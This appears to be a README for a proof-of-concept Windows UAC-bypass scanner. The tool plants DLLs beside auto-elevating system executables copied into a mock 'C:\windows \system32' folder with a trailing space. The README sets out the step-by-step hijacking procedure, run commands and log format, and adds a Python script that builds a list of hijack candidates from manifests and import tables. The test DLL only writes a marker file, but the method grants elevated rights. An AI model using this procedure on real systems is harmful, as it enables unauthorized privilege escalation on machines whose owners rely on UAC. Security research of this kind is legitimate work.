DLLHijackingScanner is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification: UAC only auto-elevates executables that appear to reside in a trusted directory such as C:\windows\system32, and the PoC satisfies that check with a mock directory (C:\windows \system32, with a trailing space after "windows") that the path check normalises to the real one while the loader still resolves DLLs from the mock one.
Generate Header from CSV
The Python script CsvToHeader.py can be used to generate a header file. By default it uses the CSV file dll_hijacking_candidates.csv shipped with the project.
For each portable executable (PE) listed in the CSV, the script checks the requestedExecutionLevel declared in the PE's manifest, which is one of:
- asInvoker
- highestAvailable
- requireAdministrator
With the -c argument, the script additionally checks whether the DLL to hijack is in the list of DLLs imported from the PE's import table.

python .\CsvToHeader.py -h
usage: CsvToHeader.py -f [DLL_PATH] -c

CsvToHeader can be used to generate a header file from a CSV.

optional arguments:
  -h, --help      show this help message and exit
  -f [DLL_PATH]   Path of the csv to convert (default="dll_hijacking_candidates.csv")
  -c              Enable import dll in PE (default=False)
  -v, --version   Show program's version number and exit
To generate the header file you can use the following command:
python CsvToHeader.py > dll_hijacking_candidates.h
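As an added example (not the project's CsvToHeader.py), the following Python script shows the shape of the CSV-to-header step: it reads candidate (PE, DLL) pairs from a CSV, extracts requestedExecutionLevel from each PE's manifest, optionally applies the import check that the -c flag enables, and emits a C header. The CSV column names, the header layout, and the sample manifests and import lists are constructed assumptions so that the script runs offline; the real script reads the manifest and import table out of the PE file itself. The example also records the manifest's autoElevate flag, which the page does not mention but which decides whether UAC auto-elevates the binary at all.

```python
"""CSV -> C header generator for DLL-hijacking candidates.

Added example, not the project's CsvToHeader.py. It assumes a CSV with the
columns "pe,dll" and that each PE's manifest and import list are available;
here both come from constructed sample data so the script runs offline.
"""
import csv
import io
import xml.etree.ElementTree as ET

# Constructed sample CSV (assumed column layout: executable name, DLL name).
SAMPLE_CSV = """pe,dll
computerdefaults.exe,PROPSYS.dll
computerdefaults.exe,Secur32.dll
notepad.exe,VERSION.dll
"""

# Constructed manifests standing in for the RT_MANIFEST resource of each PE.
SAMPLE_MANIFESTS = {
    "computerdefaults.exe": """<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>
    <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
  </requestedPrivileges></security></trustInfo>
  <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
    <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
      <autoElevate>true</autoElevate>
    </asmv3:windowsSettings>
  </asmv3:application>
</assembly>""",
    "notepad.exe": """<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>
    <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
  </requestedPrivileges></security></trustInfo>
</assembly>""",
}

# Constructed import lists standing in for each PE's import table.
SAMPLE_IMPORTS = {
    "computerdefaults.exe": ["KERNEL32.dll", "PROPSYS.dll", "ADVAPI32.dll"],
    "notepad.exe": ["KERNEL32.dll", "VERSION.dll"],
}

# The three values requestedExecutionLevel can take.
EXEC_LEVELS = ("asInvoker", "highestAvailable", "requireAdministrator")


def manifest_info(xml_text):
    """Return (requestedExecutionLevel, autoElevate) from a manifest.

    Manifests mix several XML namespaces, so tags are compared by local name.
    """
    level, auto = None, False
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]
        if tag == "requestedExecutionLevel":
            level = el.get("level")
        elif tag == "autoElevate":
            auto = (el.text or "").strip().lower() == "true"
    return level, auto


def select_candidates(csv_text, manifests, imports, check_imports=False):
    """Keep CSV rows whose PE declares a known execution level; with
    check_imports (the -c behaviour) also require the DLL to be imported."""
    rows = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        pe, dll = row["pe"].strip(), row["dll"].strip()
        level, auto = manifest_info(manifests.get(pe, "<assembly/>"))
        if level not in EXEC_LEVELS:
            continue
        imported = {d.lower() for d in imports.get(pe, [])}
        if check_imports and dll.lower() not in imported:
            continue
        rows.append((pe, dll, level, auto))
    return rows


def to_header(rows):
    """Emit a C header with one table entry per candidate (assumed layout)."""
    lines = [
        "#pragma once",
        "",
        "struct hijack_candidate { const char *pe; const char *dll; "
        "const char *level; int auto_elevate; };",
        "",
        "static const struct hijack_candidate CANDIDATES[] = {",
    ]
    for pe, dll, level, auto in rows:
        lines.append(f'    {{ "{pe}", "{dll}", "{level}", {int(auto)} }},')
    lines.append("};")
    lines.append(f"#define CANDIDATE_COUNT {len(rows)}")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    selected = select_candidates(SAMPLE_CSV, SAMPLE_MANIFESTS, SAMPLE_IMPORTS,
                                 check_imports=True)
    print(to_header(selected), end="")
```

Run as-is it prints a header with two entries: computerdefaults.exe/Secur32.dll is dropped by the import check because the constructed import list does not contain Secur32.dll. Replace SAMPLE_MANIFESTS and SAMPLE_IMPORTS with data read from real PE files (for example with the pefile module) to get the behaviour of the project's script.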
Generate the list of vulnerable PE and DLL
The files that will be used are DLLHijacking.exe and test.dll.
DLLHijacking.exe is the file that will be used to generate the list of vulnerable PEs. It performs the following steps for each candidate:
1. Create the mock directory C:\windows \system32 (note the trailing space after "windows").
2. Copy C:\windows\system32\[TARGET.EXE] to C:\windows \system32\[TARGET.EXE].
3. Copy [CUSTOM_DLL_PATH] to C:\windows \system32\[TARGET.DLL].
4. Execute C:\windows \system32\[TARGET.EXE].
5. Check for C:\ProgramData\exploit.txt to see if the exploit was successful.

DLLHijacking.exe always generates a log file exploitable.log with one line per (executable, DLL) pair tested: a result flag (1 if exploit.txt was created, 0 otherwise), the executable name and the DLL name.
E.g.
1,computerdefaults.exe,PROPSYS.dll
0,computerdefaults.exe,Secur32.dll
Execution
Command to run:
DLLHijacking.exe [DLL_PATH]
If no argument is passed, DLLHijacking.exe uses the DLL test.dll stored in its own resources.
Tested on Windows 10 Pro (10.0.19043 N/A Build 19043).
test.dll
test.dll is a simple dynamic library used to check whether the exploit succeeded. When loaded, the DLL creates the file C:\ProgramData\exploit.txt; this file is deleted once the exploit check is complete.